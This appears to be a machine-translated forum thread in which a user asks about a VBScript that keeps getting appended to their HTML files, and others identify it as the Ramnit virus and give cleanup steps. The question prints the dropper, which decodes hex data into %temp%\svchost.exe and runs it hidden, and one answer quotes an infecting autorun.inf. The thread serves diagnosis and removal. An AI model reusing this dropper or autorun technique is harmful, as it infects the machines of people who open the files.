代码之家 › 专栏 › 技术社区 › Munaver Munu

这段VB代码是如何自动添加到我的html文件中的?[重复]

virus vbscript html

Munaver Munu · 技术社区 · 2 年前

每当我在Notepad++中打开JavaScript(.js)或HTML(.HTML)文件几天后,一个类似的VB脚本就会自动添加到最后。我强烈地感觉到这是某种病毒,有人能在这方面指导我吗?

</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- Þ¼ .... {Lots of junk characters here } -->

0 回复 | 直到 9 年前

user5071892 9 年前

它运行的文件是%temp%\svchost。exe。

因此,你需要做一份任务清单

tasklist /svc /fi "imagename eq svchost.exe"

记下没有任何包含服务的svchosts。输入xxxx的实际PID

taskkill /pid xxxx /pid xxxx /pid xxxx /f

这将阻止特定部件运行。

病毒使用的技术无法可靠地工作,尤其是在非英语窗口上。

此外,在清理可能存在的其他部分之前,不要删除它,而是更改安全性以防止执行。

icacls "%temp%\svchost.exe" /deny Everyone:F

这适用于Vista,但广泛适用于所有版本。

病毒清洗

如果在正常模式下执行这些操作时遇到问题。尝试在网络安全模式下进行。

单击开始-所有程序-附件-运行并键入

msconfig

然后转到启动选项卡,单击安全启动,并勾选网络。重启。回到这里,解开安全靴,回到正常模式。

安全扫描仪

Microsoft Safety Scanner是一款免费下载的安全工具,提供按需扫描,并帮助删除病毒、间谍软件和其他恶意软件。它与您现有的防病毒软件配合使用。

http://www.microsoft.com/security/scanner/en-au/default.aspx

恶意软件删除工具

如果你不能下载或运行安全扫描程序,Windows内置了一个很小的防病毒程序。它只针对最常见的威胁。它会想要更新,不要让它更新。在不更新的情况下运行它。然后再次运行,这次更新。

单击开始-所有程序-附件-运行(或按Winkey+R)。类型

mrt

重置防火墙

您可以将防火墙重置为默认设置。

开始-所有程序-附件-右键单击命令提示符并选择以管理员身份运行。键入(或通过在命令提示窗口中单击鼠标右键并选择“粘贴”来复制和粘贴)。

netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"

安全修复

修复程序正在对来自微软的程序进行故障排除。其中有27个。

自动修复Windows安全设置以确保电脑安全

http://support.microsoft.com/mats/Malware_Prevention/en-us

和

修复安全问题以自动保护和保护Windows

http://support.microsoft.com/mats/windows_security_diagnostic/en-us

修复Internet Explorer问题,使IE快速、安全、稳定

http://support.microsoft.com/mats/ie_performance_and_safety/en-us

有关完整列表,请访问

http://support.microsoft.com/fixit/en-us

选择下载时,请选择在另一台计算机上运行的选项。然后你可以将其保存到硬盘的文件夹中。打开文件夹,打开文件夹修复它,然后运行启动修复。它将包含所有27个补丁。

全职防病毒软件

对于永久性的反病毒,我们在论坛上注意到,对于使用Microsoft Security Essentials的人来说,完全没有问题。

http://www.microsoft.com/en-au/download/details.aspx?id=5201

如果一切都失败了

微软的这个程序启动另一个基本操作系统来清理Windows。你需要把它放在USB或DVD上,然后从中启动。

http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

查看有关威胁的详细信息

微软维护着病毒信息百科全书。

http://www.microsoft.com/security/portal/threat/threats.aspx

siva 9 年前

我还认为你的系统受到了一些病毒的影响。我想分享一个与你的问题相匹配的链接,请浏览,我将在这里发布链接--> http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page

Community Dai 4 年前

我认为这是一种病毒。

所以,如果你没有防病毒软件,你需要安装防病毒软件。

我推荐免费的: Microsoft Security Essentials 或 Avast .

此外,您可以下载专门的防病毒工具,仅用于扫描,而不用于安装 Dr. Web CureIt!

然后对你的电脑进行全面扫描。

您应该检查所有启动命令并删除所有恶意命令。例如 CCleaner Free 可以帮你检查一下。

UPD 清理和删除启动命令后,可以使用 sfc 公用事业

Microsoft Windows资源检查器

扫描所有受保护系统文件的完整性,并用正确的Microsoft版本替换不正确的版本。

跑 cmd 使用管理员权限,然后运行 sfc /scannow 命令

mjb 7 年前

这是一种叫做Win32的病毒。拉姆尼特请阅读以下描述:

https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection

我刚刚在我客户的一台电脑上发现了这个病毒,这个病毒修改了我USB便携硬盘中的所有html文件。

此脚本执行VBScript以创建文件并执行它,然后在此文件夹中安装程序:

C:\Program Files\Microsoft\DesktopLayer.exe

每插入一个USB pendrive,病毒就会产生两个文件:

autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe

自动运行的内容。inf:

[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe

当此pendrive插入另一台计算机时,试图执行病毒安装程序。